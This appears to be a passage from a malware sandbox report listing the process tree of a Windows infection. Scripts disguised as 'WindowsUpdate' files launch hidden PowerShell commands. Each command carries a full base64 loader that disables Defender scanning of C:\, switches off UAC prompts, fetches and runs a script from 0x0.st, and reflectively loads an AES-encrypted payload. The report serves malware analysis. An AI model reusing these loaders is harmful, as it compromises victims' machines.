        • powershell.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 6056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7892 -s 3388 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7004 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2452 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2684 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 6980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 3388 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 4012 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7564 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWV